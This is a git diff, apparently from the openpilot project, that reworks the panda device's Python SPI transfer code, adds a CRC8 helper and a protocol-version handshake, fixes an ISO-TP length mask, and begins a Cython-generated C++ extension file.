4c3e778ad..16409ac31 100644 --- a/panda/python/constants.py +++ b/panda/python/constants.py @@ -5,6 +5,8 @@ from typing import List, NamedTuple BASEDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../") FW_PATH = os.path.join(BASEDIR, "board/obj/") +USBPACKET_MAX_SIZE = 0x40 + class McuConfig(NamedTuple): mcu: str mcu_idcode: int diff --git a/panda/python/spi.py b/panda/python/spi.py index 22d257b29..ad0225b1e 100644 --- a/panda/python/spi.py +++ b/panda/python/spi.py @@ -1,4 +1,5 @@ import binascii +import ctypes import os import fcntl import math @@ -8,15 +9,18 @@ import logging import threading from contextlib import contextmanager from functools import reduce -from typing import List, Optional +from typing import Callable, List, Optional from .base import BaseHandle, BaseSTBootloaderHandle, TIMEOUT -from .constants import McuType, MCU_TYPE_BY_IDCODE +from .constants import McuType, MCU_TYPE_BY_IDCODE, USBPACKET_MAX_SIZE +from .utils import crc8_pedal try: import spidev + import spidev2 except ImportError: spidev = None + spidev2 = None # Constants SYNC = 0x5A @@ -28,7 +32,7 @@ CHECKSUM_START = 0xAB MIN_ACK_TIMEOUT_MS = 100 MAX_XFER_RETRY_COUNT = 5 -XFER_SIZE = 1000 +XFER_SIZE = 0x40*31 DEV_PATH = "/dev/spidev0.0" @@ -36,6 +40,9 @@ DEV_PATH = "/dev/spidev0.0" class PandaSpiException(Exception): pass +class PandaProtocolMismatch(PandaSpiException): + pass + class PandaSpiUnavailable(PandaSpiException): pass @@ -54,6 +61,17 @@ class PandaSpiTransferFailed(PandaSpiException): SPI_LOCK = threading.Lock() +class PandaSpiTransfer(ctypes.Structure): + _fields_ = [ + ('rx_buf', ctypes.c_uint64), + ('tx_buf', ctypes.c_uint64), + ('tx_length', ctypes.c_uint32), + ('rx_length_max', ctypes.c_uint32), + ('timeout', ctypes.c_uint32), + ('endpoint', ctypes.c_uint8), + ('expect_disconnect', ctypes.c_uint8), + ] + class SpiDevice: """ Provides locked, thread-safe access to a panda's SPI interface. @@ -89,82 +107,161 @@ class SpiDevice: self._spidev.close() + class PandaSpiHandle(BaseHandle): """ A class that mimics a libusb1 handle for panda SPI communications. """ - def __init__(self): + + PROTOCOL_VERSION = 2 + + def __init__(self) -> None: self.dev = SpiDevice() + self._transfer_raw: Callable[[SpiDevice, int, bytes, int, int, bool], bytes] = self._transfer_spidev + + if "KERN" in os.environ: + self._transfer_raw = self._transfer_kernel_driver + + self.tx_buf = bytearray(1024) + self.rx_buf = bytearray(1024) + tx_buf_raw = ctypes.c_char.from_buffer(self.tx_buf) + rx_buf_raw = ctypes.c_char.from_buffer(self.rx_buf) + + self.ioctl_data = PandaSpiTransfer() + self.ioctl_data.tx_buf = ctypes.addressof(tx_buf_raw) + self.ioctl_data.rx_buf = ctypes.addressof(rx_buf_raw) + self.fileno = self.dev._spidev.fileno() + # helpers - def _calc_checksum(self, data: List[int]) -> int: + def _calc_checksum(self, data: bytes) -> int: cksum = CHECKSUM_START for b in data: cksum ^= b return cksum - def _wait_for_ack(self, spi, ack_val: int, timeout: int, tx: int) -> None: + def _wait_for_ack(self, spi, ack_val: int, timeout: int, tx: int, length: int = 1) -> bytes: timeout_s = max(MIN_ACK_TIMEOUT_MS, timeout) * 1e-3 start = time.monotonic() while (timeout == 0) or ((time.monotonic() - start) < timeout_s): - dat = spi.xfer2([tx, ])[0] - if dat == NACK: + dat = spi.xfer2([tx, ] * length) + if dat[0] == NACK: raise PandaSpiNackResponse - elif dat == ack_val: - return + elif dat[0] == ack_val: + return bytes(dat) raise PandaSpiMissingAck - def _transfer(self, spi, endpoint: int, data, timeout: int, max_rx_len: int = 1000, expect_disconnect: bool = False) -> bytes: + def _transfer_spidev(self, spi, endpoint: int, data, timeout: int, max_rx_len: int = 1000, expect_disconnect: bool = False) -> bytes: + max_rx_len = max(USBPACKET_MAX_SIZE, max_rx_len) + + logging.debug("- send header") + packet = struct.pack(" max_rx_len: + raise PandaSpiException(f"response length greater than max ({max_rx_len} {response_len})") + + # read rest + remaining = (response_len + 1) - preread_len + if remaining > 0: + dat += bytes(spi.readbytes(remaining)) + + + dat = dat[:3 + response_len + 1] + if self._calc_checksum(dat) != 0: + raise PandaSpiBadChecksum + + return dat[3:-1] + + def _transfer_kernel_driver(self, spi, endpoint: int, data, timeout: int, max_rx_len: int = 1000, expect_disconnect: bool = False) -> bytes: + self.tx_buf[:len(data)] = data + self.ioctl_data.endpoint = endpoint + self.ioctl_data.tx_length = len(data) + self.ioctl_data.rx_length_max = max_rx_len + self.ioctl_data.expect_disconnect = int(expect_disconnect) + + # TODO: use our own ioctl request + try: + ret = fcntl.ioctl(self.fileno, spidev2.SPI_IOC_RD_LSB_FIRST, self.ioctl_data) + except OSError as e: + raise PandaSpiException from e + if ret < 0: + raise PandaSpiException(f"ioctl returned {ret}") + return bytes(self.rx_buf[:ret]) + + def _transfer(self, endpoint: int, data, timeout: int, max_rx_len: int = 1000, expect_disconnect: bool = False) -> bytes: logging.debug("starting transfer: endpoint=%d, max_rx_len=%d", endpoint, max_rx_len) logging.debug("==============================================") n = 0 start_time = time.monotonic() exc = PandaSpiException() - while (time.monotonic() - start_time) < timeout*1e-3: + while (timeout == 0) or (time.monotonic() - start_time) < timeout*1e-3: n += 1 logging.debug("\ntry #%d", n) - try: - logging.debug("- send header") - packet = struct.pack(" bytes: + vers_str = b"VERSION" + def _get_version(spi) -> bytes: + spi.writebytes(vers_str) - if expect_disconnect: - logging.debug("- expecting disconnect, returning") - return b"" - else: - to = timeout - (time.monotonic() - start_time)*1e3 - logging.debug("- waiting for data ACK") - self._wait_for_ack(spi, DACK, int(to), 0x13) + logging.debug("- waiting for echo") + start = time.monotonic() + while True: + version_bytes = spi.readbytes(len(vers_str) + 2) + if bytes(version_bytes).startswith(vers_str): + break + if (time.monotonic() - start) > 0.01: + raise PandaSpiMissingAck - # get response length, then response - response_len_bytes = bytes(spi.xfer2(b"\x00" * 2)) - response_len = struct.unpack(" max_rx_len: - raise PandaSpiException("response length greater than max") + rlen = struct.unpack(" 1000: + raise PandaSpiException("response length greater than max") - logging.debug("- receiving response") - dat = bytes(spi.xfer2(b"\x00" * (response_len + 1))) - if self._calc_checksum([DACK, *response_len_bytes, *dat]) != 0: - raise PandaSpiBadChecksum - - return dat[:-1] - except PandaSpiException as e: - exc = e - logging.debug("SPI transfer failed, retrying", exc_info=True) + # get response + dat = spi.readbytes(rlen + 1) + resp = dat[:-1] + calculated_crc = crc8_pedal(bytes(version_bytes + resp)) + if calculated_crc != dat[-1]: + raise PandaSpiBadChecksum + return bytes(resp) + exc = PandaSpiException() + with self.dev.acquire() as spi: + for _ in range(10): + try: + return _get_version(spi) + except PandaSpiException as e: + exc = e + logging.debug("SPI get protocol version failed, retrying", exc_info=True) raise exc # libusb1 functions @@ -172,29 +269,24 @@ class PandaSpiHandle(BaseHandle): self.dev.close() def controlWrite(self, request_type: int, request: int, value: int, index: int, data, timeout: int = TIMEOUT, expect_disconnect: bool = False): - with self.dev.acquire() as spi: - return self._transfer(spi, 0, struct.pack(" int: - with self.dev.acquire() as spi: - for x in range(math.ceil(len(data) / XFER_SIZE)): - self._transfer(spi, endpoint, data[XFER_SIZE*x:XFER_SIZE*(x+1)], timeout) - return len(data) + def bulkWrite(self, endpoint: int, data: bytes, timeout: int = TIMEOUT) -> int: + for x in range(math.ceil(len(data) / XFER_SIZE)): + self._transfer(endpoint, data[XFER_SIZE*x:XFER_SIZE*(x+1)], timeout) + return len(data) def bulkRead(self, endpoint: int, length: int, timeout: int = TIMEOUT) -> bytes: - ret: List[int] = [] - with self.dev.acquire() as spi: - for _ in range(math.ceil(length / XFER_SIZE)): - d = self._transfer(spi, endpoint, [], timeout, max_rx_len=XFER_SIZE) - ret += d - if len(d) < XFER_SIZE: - break - return bytes(ret) + ret = b"" + for _ in range(math.ceil(length / XFER_SIZE)): + d = self._transfer(endpoint, [], timeout, max_rx_len=XFER_SIZE) + ret += d + if len(d) < XFER_SIZE: + break + return ret class STBootloaderSPIHandle(BaseSTBootloaderHandle): diff --git a/panda/python/uds.py b/panda/python/uds.py index 5374b5199..9b25dffe6 100644 --- a/panda/python/uds.py +++ b/panda/python/uds.py @@ -473,7 +473,7 @@ class IsoTpMessage(): # assert len(rx_data) == self.max_len, f"isotp - rx: invalid CAN frame length: {len(rx_data)}" if rx_data[0] >> 4 == ISOTP_FRAME_TYPE.SINGLE: - self.rx_len = rx_data[0] & 0xFF + self.rx_len = rx_data[0] & 0x0F assert self.rx_len < self.max_len, f"isotp - rx: invalid single frame length: {self.rx_len}" self.rx_dat = rx_data[1:1 + self.rx_len] self.rx_idx = 0 diff --git a/panda/python/usb.py b/panda/python/usb.py index 140b4cf9e..0f1bff7c1 100644 --- a/panda/python/usb.py +++ b/panda/python/usb.py @@ -1,5 +1,4 @@ import struct -from typing import List from .base import BaseHandle, BaseSTBootloaderHandle, TIMEOUT from .constants import McuType @@ -17,7 +16,7 @@ class PandaUsbHandle(BaseHandle): def controlRead(self, request_type: int, request: int, value: int, index: int, length: int, timeout: int = TIMEOUT): return self._libusb_handle.controlRead(request_type, request, value, index, length, timeout) - def bulkWrite(self, endpoint: int, data: List[int], timeout: int = TIMEOUT) -> int: + def bulkWrite(self, endpoint: int, data: bytes, timeout: int = TIMEOUT) -> int: return self._libusb_handle.bulkWrite(endpoint, data, timeout) # type: ignore def bulkRead(self, endpoint: int, length: int, timeout: int = TIMEOUT) -> bytes: diff --git a/panda/python/utils.py b/panda/python/utils.py new file mode 100644 index 000000000..f91da6413 --- /dev/null +++ b/panda/python/utils.py @@ -0,0 +1,12 @@ +def crc8_pedal(data): + crc = 0xFF # standard init value + poly = 0xD5 # standard crc8: x8+x7+x6+x4+x2+1 + size = len(data) + for i in range(size - 1, -1, -1): + crc ^= data[i] + for _ in range(8): + if ((crc & 0x80) != 0): + crc = ((crc << 1) ^ poly) & 0xFF + else: + crc <<= 1 + return crc diff --git a/rednose/helpers/ekf_sym_pyx.cpp b/rednose/helpers/ekf_sym_pyx.cpp new file mode 100644 index 000000000..2db376fbb --- /dev/null +++ b/rednose/helpers/ekf_sym_pyx.cpp @@ -0,0 +1,34413 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "rednose/helpers/ekf_sym.h" + ], + "language": "c++", + "name": "rednose.helpers.ekf_sym_pyx", + "sources": [ + "/data/openpilot/rednose/helpers/ekf_sym_pyx.pyx" + ] + }, + "module_name": "rednose.helpers.ekf_sym_pyx" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * 